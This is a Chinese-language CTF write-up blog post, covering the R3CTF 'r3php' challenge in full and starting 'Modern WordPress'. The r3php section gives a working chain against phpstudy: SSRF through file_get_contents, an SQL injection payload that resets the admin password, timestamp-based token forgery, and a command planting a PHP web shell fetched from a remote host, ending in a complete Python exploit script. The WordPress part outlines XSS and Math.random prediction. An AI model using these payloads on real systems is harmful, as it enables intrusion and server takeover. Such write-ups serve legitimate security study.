<\/p>\n
<\/p>\n
\n
\u76ee\u5f55<\/strong><\/h3>\n\n- \n
\n- 2024\u5e746\u6708\u00a0 R3CTF<\/strong><\/span>\n
\n- web >> r3php<\/a><\/span><\/strong><\/li>\n
- web >> Modern WordPress<\/span><\/strong><\/a><\/li>\n
- web >> JustMongo<\/span><\/strong><\/a><\/li>\n
- web >> NinjaClub<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
\n- \n
\n- 2024\u5e745\u6708\u00a0 \u4eac\u9e92CTF<\/strong><\/span>\n
\n- web >> ezldap<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
\n- \n
\n- 2024\u5e744\u6708\u00a0 D^3CTF<\/strong><\/span>\n
\n- web >> d3pythonhttp<\/span><\/strong><\/a><\/li>\n
- web >> Doctor<\/span><\/strong><\/a><\/li>\n
- web >> moonbox<\/span><\/strong><\/a><\/li>\n
- web >> stack_overflow<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
\n- \n
\n- 2023\u5e7411\u6708\u00a0 \u5f3a\u7f51\u62df\u6001\u7ebf\u4e0a<\/strong><\/span>\n
\n- web >> noumisotuitennnoka<\/span><\/strong><\/a><\/li>\n
- web >> easyjava<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
\n- \n
\n- 2023\u5e7411\u6708\u00a0 HITCTF<\/strong><\/span>\n
\n- Reverse & Web<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
\n- \n
\n- 2023\u5e7410\u6708\u00a0 N1CTF<\/strong><\/span>\n
\n- web >> ggos<\/span><\/strong><\/a><\/li>\n
- web >> laravel<\/span><\/strong><\/a><\/li>\n
- web >> ezmaria<\/span><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
<\/p>\n
\n<\/a>\u00a02024\u5e746\u6708\u00a0 R3CTF<\/span><\/strong><\/p>\n\n- \n
web >> r3php<\/strong><\/span><\/p>\n<\/li>\n<\/ul>\n\u9996\u5148\u7ed9\u5230\u7684\u662f\u4e00\u4e2a\u65e0\u56de\u663e file_get_contents()\uff0c\u9650\u5b9a http \u534f\u8bae\uff0c\u53ef\u4ee5\u81ea\u5b9a\u4e49\u8bf7\u6c42\u5934\u3002\u6240\u4ee5\u76ee\u6807\u5f88\u660e\u786e\uff0c\u5c31\u662f SSRF \u653b\u51fb phpstudy \u7684\u5185\u7f51\u534f\u8bae\u3002<\/p>\n
php-fpm \u5f00\u7740\uff0c\u4f46\u662f\u8fd9\u91cc\u6ca1\u6cd5\u6253\u30029080 \u7528 Workerman \u5f00\u7740\u540e\u53f0\u9762\u677f\u754c\u9762\uff0c\u9664\u4e86\u767b\u5f55\u63a5\u53e3\u90fd\u6709\u9274\u6743\uff0c\u7ed5\u4e86\u5f88\u5927\u7684\u5f2f\u8def\u4e4b\u540e\u53d1\u73b0\uff0c\u6ca1\u6cd5\u4f7f\u7528\u81ea\u5b9a\u4e49\u7684 session cookie\uff08\u5b58\u7591\uff1f\u5176\u5b9e\u8fd9\u91cc\u9762\u8fd8\u5b58\u5728\u8bfb\u6587\u4ef6\/\u53cd\u5e8f\u5217\u5316\u7684\u903b\u8f91\uff09\uff0c\u6bcf\u6b21 sessionStart() \u90fd\u4f1a\u5237\u65b0\uff0c\u81ea\u7136\u9a8c\u8bc1\u7801\u5c31\u65e0\u6cd5\u7206\u7834\uff0c\u5728 GET \u540e\u9762\u4f2a\u9020 POST \u7684\u65f6\u5019\u4e5f\u8001\u662f\u7206 400\uff0c\u4e0d\u77e5\u9053\u548b\u56de\u4e8b\uff0c\u53ea\u5f97\u653e\u5f03\u3002<\/p>\n
8090 \u7aef\u53e3\u5f00\u7740 phpstudy \u7a0b\u5e8f\uff0c\u524d\u7aef\u754c\u9762\u4f7f\u7528\u81ea\u5b9a\u4e49\u7684\u534f\u8bae\u4e0e\u5176\u901a\u4fe1\uff1a<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phpstudy-com-protocol.png\")
<\/p>\n
\u53ef\u4ee5\u770b\u5230\u662f\u6bd4\u8f83\u7c97\u7cd9\u7684\uff0cJSON^^^ \u8fd9\u6837\uff0c\u5148\u770b\u770b\u540e\u53f0\u5b9e\u9645\u7684\u767b\u5f55\u903b\u8f91\u5982\u4f55\u5b9e\u73b0\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phstudy-login-command.png\")
<\/p>\n
\u5bc6\u7801\u5728\u524d\u9762\u53d6\u4e86 MD5\uff0c\u7528\u6237\u540d\u5565\u8fc7\u6ee4\u6ca1\u6709\uff0c\u4e5f\u5c31\u662f\u8bf4\u5b58\u5728 SQLite \u6ce8\u5165\u3002<\/p>\n
\u521a\u5f00\u59cb\u80af\u5b9a\u4f1a\u60f3\u901a\u8fc7 9080 \u7684\u90a3\u4e2a\u9762\u677f\u6253\uff0c\u6bd5\u7adf\u90fd\u662f HTTP\uff0c\u559c\u95fb\u4e50\u89c1\u7684\u662f\uff0cPHP 5 \u4e0b htmlspecialchars \u4e5f\u6ca1\u8fc7\u6ee4\u5355\u5f15\u53f7\uff0c\u6240\u4ee5\u4e00\u4e2a\u76f4\u89c2\u7684\u60f3\u6cd5\u662f\u76f4\u63a5\u7528\u4e07\u80fd\u5bc6\u7801\u6253\u8fdb\u53bb\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phpstudy-frontend-login.png\")
<\/p>\n
\u7136\u540e\u5c31\u4f1a\u9047\u5230\u4e24\u4e2a\u95ee\u9898\uff0c\u4e00\u662f\u6ca1\u6709\u56de\u663e\uff0c\u6ca1\u6709\u9a8c\u8bc1\u7801\u7684 session\uff0c\u65e0\u4ece\u767b\u5f55\uff0c\u4e8c\u662f\u5b9e\u9645\u8bd5\u8fc7\u4e07\u80fd\u5bc6\u7801\u4e4b\u540e\uff0c\u53d1\u73b0\u90a3\u4e2a\u7a0b\u5e8f\u5b83 crash \u4e86\uff0c\u6ca1\u9519\uff0csegmentation falt\uff0c\u4e0d\u77e5\u9053\u662f\u540e\u8fb9\u63d2\u767b\u5f55\u65e5\u5fd7\u7684\u65f6\u5019\u62a5\u9519\uff0c\u76f4\u63a5\u7a7a\u6307\u9488\u5f15\u7528\u4e86\u8fd8\u662f\u5565\uff0c\u603b\u4e4b\u4e00\u53e5\u8bdd\u5c31\u662f\uff0c\u5373\u4f7f\u89e3\u51b3\u4e86 session \u7684\u95ee\u9898\uff0c\u5728\u524d\u7aef 16 \u4e2a\u5b57\u7b26\uff0c\u7ecf\u8fc7 htmlspecialchars\uff0c\u8981\u6784\u9020\u51fa\u540c\u65f6\u7b26\u5408 SELECT \u548c INSERT \u8bed\u6cd5\u7684\u8bed\u53e5\uff0c\u975e\u5e38\u56f0\u96be\u3002<\/p>\n
\u63a5\u7740 nc \u8fde\u4e0a 8090\uff0c\u8bd5\u8bd5\u5b83\u8fd9\u4e2a\u534f\u8bae\u3002\u5982\u679c\u6bcf\u884c\u6253\u4e00\u4e2a JSON^^^\uff0c\u662f\u53ef\u4ee5\u5728\u5355\u4e2a\u8fde\u63a5\u5185\u6267\u884c\u591a\u6b21\u7684\uff0c\u5373\u4f7f\u524d\u9762\u62a5\u9519\u4e86\u4e5f\u80fd\u7ee7\u7eed\uff0c\u8fd9\u4e00\u70b9\u5f88\u91cd\u8981\u3002\u5176\u5b83\u63a5\u53e3\u4e5f\u9700\u8981\u9274\u6743\uff0c\u4f7f\u7528\u7684 TOKEN \u7531\u767b\u5f55\u63a5\u53e3\u8fd4\u56de\uff0c\u5927\u6982\u770b\u4e86\u4e00\u4e0b\uff0c\u4fdd\u5b58\u5728 std::map \u91cc\uff0c\u5c31\u522b\u8bf4\u5565\u4f2a\u9020\u4e86\u3002<\/p>\n
\u7efc\u5408\u4ee5\u4e0a\u7684\u6240\u6709\u4fe1\u606f\uff0c\u518d\u6b21\u660e\u786e\u73b0\u9636\u6bb5\u7684\u76ee\u6807\uff0c\u9996\u5148\u5f97\u767b\u5f55\u8fdb\u8fd9\u4e2a\u7cfb\u7edf\u3002\u90a3\u4e48\u5165\u53e3\u70b9\u80af\u5b9a\u662f\u8fd9\u4e2a SQL \u6ce8\u5165\u3002\u53ef\u4ee5\u60f3\u5230\uff0c\u5982\u679c\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c\u7684\u8bdd\uff0c\u53ef\u4ee5\u76f4\u63a5\u63d2\u5165\u4e00\u4e2a\u6076\u610f INSERT \u66f4\u65b0 admin \u7684\u5bc6\u7801\uff0c\u800c\u5728\u672c phpstudy \u4e2d\uff0c\u5982\u679c\u5728\u67e5\u8be2\u4e2d\u63d2\u5165\u591a\u4e2a SELECT\uff0c\u53ea\u6709\u6700\u540e\u4e00\u4e2a\u7684\u7ed3\u679c\u4f1a\u88ab\u8fd4\u56de\uff0c\u4e5f\u5c31\u662f\u8bf4\u5176\u4f7f\u7528\u7684 c sqlite \u5e93\u786e\u5b9e\u662f\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c\u7684\u3002<\/p>\n
\u73b0\u5728\u8fd8\u9700\u8981 ADMINS \u7684\u8868\u7ed3\u6784\u4ee5\u53ca\u5bc6\u7801\u7684 MD5 \u6765\u5b8c\u6210\u8fd9\u4e00\u6b65\u9aa4\u3002\u524d\u8005\u76f4\u63a5 strings \u4e00\u4e0b\u5c31\u80fd\u770b\u5230\uff0c\u800c\u540e\u8005\uff0c\u8fd9\u8fd8\u80fd\u662f\u4e2a\u95ee\u9898\uff1f\u4f46\u662f\u5c31\u662f\u600e\u4e48\u8bd5\u5c31\u662f\u4e0d\u5bf9\u3002\u5e94\u8be5\u4e0d\u4f1a\u6709\u4eba\u60f3\u53bb\u628a\u5b83 MD5 \u7684\u7b97\u6cd5\u9006\u51fa\u6765\uff0c\u4e8e\u662f\u4e00\u4e2a\u76f4\u89c2\u7684\u60f3\u6cd5\u662f\uff0c\u628a\u5bc6\u7801\u5148\u6539\u6210 123456\uff0c\u7136\u540e\u5728\u6570\u636e\u5e93\u4e2d\u627e\u5230\u5bf9\u5e94 hash \u503c\u3002\u4f46\u662f\u6570\u636e\u5e93\u5462\uff1f\u641c\u4e86\u534a\u5929\u6ca1\u627e\u5230\uff0cstrace openat \u4e86\u4e5f\u6ca1\u627e\u5230\uff0c\u6709\u70b9\u6000\u7591\u4eba\u751f\u3002\u518d\u770b\u770b\u4ee3\u7801\uff0c\u80fd\u53d1\u73b0\u5e95\u4e0b\u8fd9\u4e2a\u9006\u5929\u7684\u6df7\u6dc6\uff1a<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phpstudy-sqlitedb-start.png\")
<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phpstudy-sqlitedb-key.png\")
<\/p>\n
\u66f4\u8981\u547d\u7684\u662f\uff0c\u76f4\u63a5\u628a\u6570\u636e\u5e93\u8131\u51fa\u6765\u7528 sqlcipher \u8fd8\u6253\u4e0d\u5f00\uff0c\u4f30\u8ba1\u662f\u5b83\u5728 depends \u91cc hook \u4e86 sqlite3 \u7cfb\u5217\u51fd\u6570\uff0c\u53c8\u52a0\u5bc6\u4e86\u4e00\u6b21\u3002\u4e00\u4e2a MD5 \u641e\u5f97\u8fd9\u4e48\u9ebb\u70e6\uff1f\u7528 gdb \u4e5f\u4e0b\u4e0d\u4e86 breakpoint\uff0c\u4e0d\u77e5\u9053\u53c8\u5e72\u4e86\u5565\u3002\u7136\u540e\u60f3\u5230\u5b83\u4f1a\u5728\u6267\u884c\u5931\u8d25\u7684\u65f6\u5019\u6253\u5370 log\uff0c\u4e8e\u662f\u5c31\u627e\u4e86\u4e2a\u8bed\u53e5\u91cc\u8fb9\u5e26 MD5 \u7684\uff0c\u8ba9\u5b83\u62a5\u9519\uff0c\u5c31\u80fd\u5728\u56de\u663e\u91cc\u770b\u5230\u4e4b\u524d\u5fc3\u5fc3\u5ff5\u5ff5\u7684\u5bc6\u7801 hash\uff0c\u8fd9\u91cc\u7528\u4e86 add_admin \u8fd9\u4e2a command\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phpstudy-addadmin-errorlog.png\")
<\/p>\n
cmd5 \u7adf\u7136\u8fd8\u8ba4\u8bc6\uff0c\u53cd\u6b63\u6211\u4e0d\u8ba4\u8bc6\u3002\u603b\u4e4b hash \u6709\u4e86\uff0c\u8868\u7ed3\u6784\u6709\u4e86\uff0c\u5c31\u53ef\u4ee5\u6784\u9020\u8fd9\u6837\u7684 command \u8fdb\u884c SQL \u6ce8\u5165\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-cmd5-result.png\")
<\/p>\n
{\"command\":\"login\",\"data\":{\"username\":\"aaa'; UPDATE ADMINS SET PASSWORD='c26be8aaf53b15054896983b43eb6a65'; -- a\",\"pwd\":\"123456\"},\"token\":\"\"}<\/pre>\n\u6700\u540e\u5343\u4e07\u522b\u8ba9\u5b83\u8fd4\u56de\u5565\u7ed3\u679c\uff0c\u5426\u5219\u8fdb\u5165\u63d2\u5165\u65e5\u5fd7\u6d41\u7a0b\u7684\u65f6\u5019\u5c31\u4f1a\u5d29\u6e83\uff0c\u53cd\u6b63\u6211\u662f\u633a\u96be\u5d29\u3002<\/p>\n
\u4fee\u6539\u8fc7\u540e\uff0c\u5c31\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528 123456 \u5bc6\u7801\u767b\u5f55\u4e86\u3002\u5728\u9762\u677f\u91cc\u5927\u6982\u7ffb\u4e86\u7ffb\uff0c\u6587\u4ef6\u64cd\u4f5c\u57fa\u672c\u4e0a\u662f\u7531 9080 \u7684 php \u5b9e\u73b0\u7684\uff0c\u4e0d\u8fc7\u6709\u4e2a\u4e0b\u8f7d\u8fdc\u7a0b\u6587\u4ef6\u7684\u529f\u80fd\uff0c\u53c2\u6570\u76f4\u63a5\u4f20\u8fdb json\uff0c\u662f\u540e\u7aef\u5b9e\u73b0\u7684\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phpstudy-download-remote-file.png\")
<\/p>\n
\u76f4\u63a5\u5f80 wwwroot \u91cc\u4e0b shell \u5c31\u5b8c\u4e8b\u4e86\u3002\u6d4b\u8fc7\u4e4b\u540e\uff0c\u786e\u5b9e\u662f\u53ef\u4ee5\u7684\u3002\u4e5f\u5c31\u662f\u8bf4\uff0c\u6574\u4f53\u4e0a\u7684\u653b\u51fb\u94fe\u5df2\u7ecf\u5b8c\u6210\u3002<\/p>\n
{\"command\":\"download_remote_file\",\"uid\":4,\"data\":{\"remote_url\":\"http:\/\/IP\/shell.php\",\"download_to\":\"\/www\/admin\/localhost_80\/wwwroot\/shell.php\"},\"token\":\"TOKEN\"}<\/pre>\n\u8fd8\u5269\u4e0b\u51e0\u4e2a\u95ee\u9898\uff0c\u4e00\u662f\u6ca1\u6709\u56de\u663e\uff0c\u800c TOKEN \u7531 login command \u8fd4\u56de\uff0c\u4e5f\u8ddf\u968f\u673a session \u5237\u65b0\u4e86\u4e00\u6837\uff0c\u4e0d\u592a\u53ef\u63a7\u3002\u5e78\u597d\u591a\u770b\u4e86\u773c\u5b83\u7684\u751f\u6210\u7b97\u6cd5\uff1a<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phpstudy-token-generation.png\")
<\/p>\n
\u53d1\u73b0\u7adf\u7136\u662f timestamp\uff0c\u4e0d\u662f\u9884\u671f\u7684\u968f\u673a\u6570\uff0c\u5e95\u4e0b\u8fd8 insert \u62fc\u63a5\uff0cMD5 \u4e86\u51e0\u6b21\u3002\u9274\u4e8e\u6ca1\u6709\u529e\u6cd5\u8c03\u8bd5\uff0ctcpdump \u6293\u4e86\u4e2a\u5305\uff0c\u6700\u540e\u731c\u51fa\u6765\u4e86\uff1amd5(md5('admin'+timestamp).upper())<\/code><\/p>\n![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phpstudy-tcpdump-login-token.png\")
<\/p>\n
TOKEN \u7684\u95ee\u9898\u89e3\u51b3\uff0c\u5728\u53d1\u9001 login command \u7684\u65f6\u5019\u8ba1\u7b97\uff0c\u4e4b\u540e\u7684\u8bf7\u6c42\u5e26\u4e0a\u5373\u53ef\u3002<\/p>\n
\u73b0\u5728\u5c31\u5269\u6700\u540e\u4e00\u6b65\uff0c\u5c06\u8fd9\u4e9b\u64cd\u4f5c\u96c6\u6210\u5230\u4e00\u5f00\u59cb\u7684 file_get_contents() \u91cc\u9762\u3002\u4f46\u662f\u5f88\u5feb\u5c31\u9047\u5230\u4e86\u65b0\u7684\u95ee\u9898\uff0c\u7528 tcpdump \u53ef\u4ee5\u770b\u5230\uff0cf_g_c() \u53d1\u9001\u5b8c\u8bf7\u6c42\u540e\uff0c\u53ea\u6536\u5230\u4e86\u524d\u9762 parse error: GET \/ … \u8fd9\u4e2a\u56de\u5305\uff0c\u540e\u9762\u7684 ^^^ \u4f3c\u4e4e\u6ca1\u6709\u88ab\u89e3\u6790\uff0c\u8fd9\u4e0e\u5728 nc \u4e2d\u5f97\u5230\u7684\u7ed3\u679c\u4e0d\u540c\uff0c\u4e3a\u4ec0\u4e48\u5462\uff1f<\/p>\n
\u4ece\u90a3\u4e2a\u5de8tm\u957f\uff0cIDA F5 \u8dd1\u4e86\u4e24\u5c0f\u65f6\u6ca1\u51fa\u6765\u6700\u540e\u653e\u5f03\u4e86\u7684\u4e3b\u8c03\u5ea6\u51fd\u6570\u4e2d\u56de\u6eaf\uff0c\u53ef\u4ee5\u770b\u5230\u5904\u7406 socket \u7684\u6d41\u7a0b\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/r3php-phpstudy-ida-onsocket.png\")
<\/p>\n
\u5927\u6982\u5c31\u662f\uff0c\u6b7b\u5faa\u73af\u91cc\u8fb9 read()\uff0c\u6709\u6570\u636e\u4e4b\u540e\u52a0\u8fdb\u7f13\u51b2\u533a\uff0c\u641c\u7b2c\u4e00\u4e2a ^^^ \u8fdb\u884c\u5904\u7406\u3002\u4e5f\u5c31\u662f\u8bf4\uff0c\u5982\u679c\u6211\u4eec\u53d1\u9001\u5f97\u592a\u5feb\uff0c\u7b2c\u4e00\u6b21\u5c31\u5168\u90e8 read \u8fdb\u6765\u4e86\uff0c\u5904\u7406\u5b8c\u7b2c\u4e00\u6761 command \u4e4b\u540e\u5373\u4f7f\u8fd8\u6709\u7b2c\u4e8c\u4e2a\uff0c\u4e5f\u4f1a\u5728 read() \u5904\u963b\u585e\uff0c\u6ca1\u6cd5\u7ee7\u7eed\u6267\u884c\u3002\u4e4b\u524d nc \u4e00\u884c\u884c\u5730\u53d1\u9001\u6b63\u597d\u907f\u514d\u4e86\u8fd9\u79cd\u60c5\u51b5\u7684\u53d1\u751f\u3002<\/p>\n
\u90a3\u73b0\u5728\u600e\u4e48\u529e\u5462\uff1ffile_get_contents() \u80af\u5b9a\u662f\u6ca1\u6cd5\u7b49\u5230\u6570\u636e\u53d1\u56de\u6765\uff0c\u518d\u63a5\u7740\u7ee7\u7eed\u53d1\u7684\u3002\u5176\u5b9e\u53ef\u4ee5\u53d1\u73b0\uff0c\u53ea\u8981\u8ba9 read() \u4e0d\u963b\u585e\u5c31\u884c\u4e86\uff0c^^^ \u53ef\u4ee5\u5305\u542b\u5728\u521a\u5f00\u59cb\u53d1\u8fc7\u53bb\u7684\u6570\u636e\u91cc\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u53ef\u4ee5\u7528\u4e00\u5806\u5783\u573e\u6570\u636e\u4e0d\u65ad\u586b\u6ee1 read \u7684\u7f13\u51b2\u533a\uff0c\u8ba9 f_g_c() \u4e00\u76f4\u53d1\uff0c\u7b49\u5230 phpstudy \u5904\u7406\u5b8c\u7b2c\u4e00\u4e2a parse error \u4e3a\u6b62\uff0c\u5982\u679c\u6570\u636e\u8d3c\u591a\uff0c\u8fd8\u5728\u53d1\u7684\u8bdd\uff0c\u5c31\u80fd\u987a\u5229\u6267\u884c\u7b2c\u4e8c\u6761 command\u3002<\/p>\n
\u81f3\u6b64\uff0c\u5df2\u7ecf\u5b8c\u6210\u672c\u9898\u653b\u51fb\u94fe\u4e2d\u6240\u6709\u7ec6\u8282\u3002<\/p>\n
trash data \u5237\u65b0\u7f13\u51b2\u533a ==> SQL \u6ce8\u5165\u4fee\u6539 admin \u5bc6\u7801 ==> \u57fa\u4e8e Timestamp \u8ba1\u7b97\u767b\u5f55 TOKEN ==> \u8fdc\u7a0b\u4e0b\u8f7d PHP shell \u81f3 wwwroot<\/p>\n
import requests, time, hashlib\r\n\r\nURL = 'http:\/\/ctf2024-entry.r3kapig.com:32182\/'\r\n\r\ndef send_json(pay):\r\n data = {'url': 'http:\/\/127.0.0.1:8090\/aaa',\r\n 'header': '^^^' + pay + '^^^' + 'A'*100000}\r\n try:\r\n res = requests.post(URL, data=data, timeout=3)\r\n except requests.exceptions.Timeout:\r\n print('timeout')\r\n else:\r\n print(res.status_code)\r\n\r\n\r\nsend_json('''{\"command\":\"login\",\"data\":{\"username\":\"aaa'; UPDATE ADMINS SET PASSWORD='c26be8aaf53b15054896983b43eb6a65'; -- a\",\"pwd\":\"123456\"},\"token\":\"\"}''')\r\nts = int(time.time())\r\nprint('timestamp', ts)\r\ntoken = hashlib.md5(hashlib.md5(('admin' + str(ts)).encode()).hexdigest().upper().encode()).hexdigest().upper()\r\nsend_json('''{\"command\":\"login\",\"data\":{\"username\":\"admin\",\"pwd\":\"123456\"},\"token\":\"\"}''')\r\nsend_json('''{\"command\":\"download_remote_file\",\"uid\":4,\"data\":{\"remote_url\":\"http:\/\/IP\/shell.php\",\"download_to\":\"\/www\/admin\/localhost_80\/wwwroot\/shell.php\"},\"token\":\"TOKEN\"}'''.replace(\"TOKEN\", token))<\/pre>\n\u540e\u8bb0\uff1a\u51fa\u9898\u4eba\u76f4\u63a5\u5199\u4e86\u4e2a\u8ba1\u5212\u4efb\u52a1 TASKMNG \u8868\uff0c\u6211\u538b\u6839\u6ca1\u6ce8\u610f\u5230\u3002<\/p>\n
<\/a>\u00a0<\/p>\n\n- web >> Modern WordPress
\n<\/strong><\/span><\/li>\n<\/ul>\n\u4ee3\u7801\u5f88\u591a\uff0c\u5f88\u590d\u6742\uff0c\u9996\u5148\u660e\u786e\u4e00\u4e0b\u8981\u505a\u4ec0\u4e48\u3002<\/p>\n
\u8981\u83b7\u53d6 flag\u3002flag \u5728\u54ea\uff1f\/api\/flag \u8def\u7531\u91cc\u8fb9\u6709\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-route-api-flag.png\")
<\/p>\n
\u7136\u540e\u9700\u8981 info.accounts[0].addr \u53ca\u5176\u79c1\u94a5\u7528\u6765\u7b7e\u540d\u3002\u8fd9\u4e2a\u53c8\u5728\u54ea\u91cc\uff1f\/api\/bot \u91cc\u9762\u6709\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-route-api-bot.png\")
<\/p>\n
\u8fd9\u91cc\u662f\u4e2a XSS\uff0cadmin \u628a\u79c1\u94a5\u586b\u8fdb\u53bb\uff0c\u7136\u540e\u770b\u4e86\u770b Posts\u3002\u5148\u522b\u7ba1\u5177\u4f53\u548b X \u7684\uff0c\u627e\u627e\u5185\u5bb9\u4ece\u54ea\u91cc\u6765\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-page-posts.png\")
<\/p>\n
\u53ef\u4ee5\u53d1\u73b0 admin \u67e5\u770b\u4e86\u81ea\u5df1\u7684 Posts\uff0c\u7136\u540e\u4e0a\u8fb9\u90a3\u4e2a dangerouslySetInnerHTML \u76f4\u63a5\u5c31\u628a\u6211\u4eec\u7684\u5185\u5bb9\u5408\u5e76\u8fdb\u53bb\uff0c\u4e00\u53d1 XSS \u4e86\u3002<\/p>\n
\u6240\u4ee5\u6211\u4eec\u7684\u76ee\u6807\u662f\uff0c\u4fee\u6539 admin \u7684 Posts \u4e3a\u6076\u610f\u5185\u5bb9\uff0c\u89e6\u53d1 XSS\u3002\u53ea\u6709\u8fd9\u6761\u8def\uff0c\u56e0\u4e3a\u5176\u4ed6\u5565\u53c2\u6570\u90fd\u4e0d\u53ef\u63a7\u3002<\/p>\n
\u90a3\u4e48\u73b0\u5728\u53ef\u4ee5\u505a\u4ec0\u4e48\u5462\uff1f\u6709\u4e2a\u533a\u5757\u94fe\uff0cweb3\uff0c\u60f3\u5e72\u70b9\u5565\u90fd\u8981\u91d1\u5e01\uff0c\u4f46\u662f\u521d\u59cb\u8d26\u6237\u91cc\u6ca1\u6709\u4f59\u989d\u3002\u6240\u4ee5\u9996\u5148\uff0c\u5f97\u5f80\u81ea\u5df1\u7684\u8d26\u6237\u91cc\u5145\u94b1\u3002\u770b \/api\/recharge \u53ef\u4ee5\u53d1\u73b0\u5145\u94b1\u662f\u8981\u7528 redeem code \u5145\u7684\u3002\u5b83\u751f\u6210\u7684\u903b\u8f91\u662f\u8fd9\u6837\uff1a<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-recharge-redeem-code.png\")
<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-recharge-randomstr.png\")
<\/p>\n
\u7ecf\u5178 Math.random() \u4e86\uff0c\u5728 Node.JS \u91cc\u8fb9\u662f\u53ef\u4ee5\u9884\u6d4b\u7684\uff0c\u5f53\u7136\uff0c\u7406\u8bba\u4e0a\u4e5f\u53ef\u4ee5\u5411\u524d”\u9884\u6d4b”\u3002\u518d\u770b\u770b\u8fd9\u73a9\u610f\u5176\u4ed6\u7684\u8f93\u51fa\u70b9\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-randomstr-call.png\")
<\/p>\n
\u53c8\u53d1\u73b0\uff0c\u7206 500 \u7684\u65f6\u5019\u987a\u4fbf\u628a\u8fd9\u73a9\u610f\u8f93\u51fa\u6765\u4e86\uff0c\u7ed9\u5b9a\u4e86\u8db3\u591f\u7684\u72b6\u6001\u4ee5\u540e\uff0c\u5c31\u53ef\u4ee5\u8fd8\u539f redeem code\u3002<\/p>\n
https:\/\/github.com\/PwnFunction\/v8-randomness-predictor<\/a><\/p>\n\u7136\u800c\u518d\u4ed4\u7ec6\u770b\u770b\uff0c\u4f1a\u53d1\u73b0\u6709\u70b9\u4e0d\u5bf9\u5934\u3002\u8fd9\u91cc\u8f93\u51fa\u7684\u662f 36 \u8fdb\u5236\u7684 String\uff0c\u4e00\u6b21 Math.random().toString(36)<\/code> \u5c0f\u6570\u70b9\u540e\u6709 11 \u4f4d\uff0crecharge \u7684 16 \u957f\u5ea6\u7531\u4e24\u4e2a\u62fc\u63a5\u800c\u6765\uff0c\u4f46\u62a5\u9519\u91cc\u80fd\u83b7\u53d6\u7684\u53ea\u6709 10 \u4f4d\uff0c\u4e5f\u5c31\u662f\u6700\u540e\u4e00\u4f4d\u6ca1\u4e86\u3002<\/p>\n\u521a\u5f00\u59cb\u60f3\u7206\u7834\uff0c\u7136\u540e\u53d1\u73b0\u4e0d\u592a\u73b0\u5b9e\u3002\u5176\u5b9e V8 \u968f\u673a\u6570\u751f\u6210\u7684\u903b\u8f91\u5f88\u7b80\u5355\uff0c\u5c31\u662f\u4f4d\u79fb\u79fb\u5f02\u6216\u6216\uff0c\u6240\u4ee5\u7406\u8bba\u4e0a\u5931\u53bb\u4e86\u6700\u540e\u4e00\u4f4d\uff08\u5927\u7ea6 4~8 bit \u7684\u4fe1\u606f\uff09\uff0c\u662f\u80fd\u901a\u8fc7\u66f4\u591a\u7684\u72b6\u6001\u8865\u5145\u56de\u6765\u7684\u3002\u4e5f\u5c31\u662f\u8bf4\u8981\u505a\u7684\u5176\u5b9e\u5f88\u7b80\u5355\uff0c\u628a\u4ee3\u7801\u6539\u6210\u5411\u524d\u56de\u6eaf\u72b6\u6001\uff08”\u9884\u6d4b”\uff09\u7684\uff0c\u7136\u540e\u52a0\u5165 10 \u4e2a\u5de6\u53f3\u751f\u6210\u7684\u6570\uff08\u539f\u672c\u662f 5 \u4e2a\uff09\uff0c\u5728\u8ba1\u7b97\u65f6\u628a\u4f4e 8 \u4f4d mask \u6389\uff08\u8868\u793a\u672a\u77e5\uff09\uff0c\u7167\u6837\u80fd\u89e3\u51fa\u6765\u3002<\/p>\n
